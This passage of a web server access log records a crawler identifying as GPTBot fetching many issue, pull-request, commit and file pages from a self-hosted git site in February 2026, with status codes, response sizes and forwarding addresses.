9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPostgresWatchdog.pkg" [Client 74.7.227.38] [Length 18039] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:19:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11312] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:19:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] 